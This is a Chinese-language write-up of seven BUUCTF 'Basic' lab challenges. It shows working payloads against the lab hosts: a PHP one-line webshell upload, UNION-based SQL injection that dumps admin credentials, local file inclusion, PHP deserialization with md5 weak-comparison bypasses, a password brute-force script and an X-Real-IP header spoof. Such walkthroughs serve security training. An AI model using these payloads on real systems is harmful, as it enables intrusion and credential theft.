buuctf Basic

1.Linux Labs

根据提示我们可以知道需要远程连接linux服务器，这里使用xshell进行如下配置

输入ssh的用户名root，密码123456

连接成功

构造命令

ls ../

查看文件

查看flag

cat ../flag.txt

为flag{8fee8783-1ed5-4b67-90eb-a1d603a02080}

2.BUU LFI COURSE 1

访问url：

http://1dfbd1cf-beb9-496d-866d-d8be04ecc4fe.node3.buuoj.cn/

审查源代码，可以发现是通过get方式对file进行传参

构造payload：

http://1dfbd1cf-beb9-496d-866d-d8be04ecc4fe.node3.buuoj.cn/?file=/flag

获取flag为flag{f2be8efe-aafb-4272-9026-15daa6109822}

3.BUU CODE REVIEW 1

访问url

http://18edd6f4-f2cd-4c9c-89a7-38c5cd491305.node3.buuoj.cn/

审查源码

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);

class BUU {                        //类：BUU               
   public $correct = "";           //公有属性：$correct
   public $input = "";             //公有属性：$input

   public function __destruct() {  //公有析构方法__destruct()，在当前类的实例化对象销毁前，自动被调用
       try {
           $this->correct = base64_encode(uniqid());      //给correct赋值为base64_encode(uniqid()) //uniqid() 函数基于以微秒计的当前时间，生成一个唯一的 ID。
           if($this->correct === $this->input) {          //判断两个属性是否全等
               echo file_get_contents("/flag");           //若全等，则打印根目录下的flag
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {          //GET方法传递pleaseget变量值为1
    if($_POST['pleasepost'] === '2') {    //POST方法传递pleasepost变量值为2
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {   //POST方法传递md51和md52的内容不同
但是md5值相同
            unserialize($_POST['obj']);
        }
    }
}

编写代码，构造payload

<?php
class BUU{
    public $correct="";
    public $input="";
}

$obj = new BUU; 
$obj->input=&$obj->correct; ////BUU类中的correct和input内容强相等，这里利用传引用的方法
echo serialize($obj);
?>

得到的字符串：

O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

通过数组使用hackbar构造payload1

http://18edd6f4-f2cd-4c9c-89a7-38c5cd491305.node3.buuoj.cn/?pleaseget=1
pleasepost=2&md51[]=1&md52[]=2&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

如下

原理：PHP 当中使用== 来进行比较的时候，系统会自动处理数据类型， 进行分析是数字比较还是字符比较。 而当一个字符串值是0e开头的时候，那么就会被当成数值。而0exxxxxx都为0.

那么就只需要找到两个不同的数值，开头却是以e0开头的即可。如下图中所示。

通过弱类型使用hackbar构造payload2

http://18edd6f4-f2cd-4c9c-89a7-38c5cd491305.node3.buuoj.cn/?pleaseget=1
pleasepost=2&md51=s1885207154a&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

如下

得到flag{e8db4533-5be4-4167-823c-99aa37dd11c3}

4.BUU BRUTE 1

访问url

http://1ceee8eb-6422-4482-b14b-ff6347146129.node3.buuoj.cn/

第一种方式，Python脚本

import requests
url = "http://1ceee8eb-6422-4482-b14b-ff6347146129.node3.buuoj.cn/?username=admin&password="
for i in range(6400, 7000):
    res = requests.get(url + str(i))
    print("[*] Try:", i)
    if res.text != "密码错误，为四位数字。":
        print(res.text)
        break

漏洞证明

第二种方式，burp爆破（注意线程要慢，否则会ban）

得到flag{410c3a24-9741-48ad-bea2-664880484307}

5.BUU UPLOAD COURSE 1

访问url

http://744b8e7e-1960-4d5e-b864-0818361e1f50.node3.buuoj.cn/index.php?file=upload.php

这是一道上传一句话木马的题，有一个可以提交文件的页面

写一个普通的 php 脚本，保存改后缀为 .php 尝试上传

<?php echo 'Hello World!'; ?>

页面提示

可以在 ?file=uploads/6078008f5d264.jpg 查看，有相应的内容回显，说明自定义的 php 脚本被成功执行

把脚本修改成一句话木马

<?php @eval(system($_POST["x"]));?>

成功上传后

访问相应的 ?file=uploads/60780125ea642.jpg，页面空白，说明 php 命令被成功执行

hackbar构造payload

http://744b8e7e-1960-4d5e-b864-0818361e1f50.node3.buuoj.cn/index.php?file=uploads/60780125ea642.jpg 

x=ls

成功拿到 shell

提交 cat /flag 拿到 flag{75427571-4ee5-4f7c-b97a-b84ad969ca1f}

6.BUU SQL COURSE 1

访问url

http://ab600305-c94f-49ad-9122-563513c0d4e1.node3.buuoj.cn/#/

首页如下

审查元素，点击测试新闻1的链接，可以在Network处看到注入点

接下来就是常规注入，构造payload，查询表名

?id=0 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

为admin,contents

查询admin表中的列名

?id=0 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin' and table_schema=database()#

为id，username，password

查询username，password的字段内容

?id=0 union select group_concat(username),group_concat(password) from admin#

为admin，5398f18f7e93f8e45f6ea31bc4105a2d

得到flag{86ac0951-9f94-4b5e-b19b-07a9a4109c15}

7.BUU BURP COURSE 1

访问url

http://458d48b9-467d-475b-a1b6-0186d6370927.node3.buuoj.cn/

页面提示

构造payload

X-Real-IP：127.0.0.1

成功绕过

构造payload

username=admin&password=wwoj2wio2jw93ey43eiuwdjnewkndjlwe 
X-Real-IP：127.0.0.1

得到flag{1470d887-a1c6-4109-b401-12ccda3cba8d}

文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。

免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章作者不为此承担任何责任。

转载声明：儒道易行 拥有对此文章的修改和解释权，如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经作者允许，不得任意修改或者增减此文章的内容，不得以任何方式将其用于商业目的。

博客:

https://rdyx0.github.io/

先知社区：

https://xz.aliyun.com/u/37846

SecIN:

https://www.sec-in.com/author/3097

CSDN:

https://blog.csdn.net/weixin_48899364?type=blog

公众号：

https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

FreeBuf：

https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

原文始发于微信公众号（儒道易行）：buuctf Basic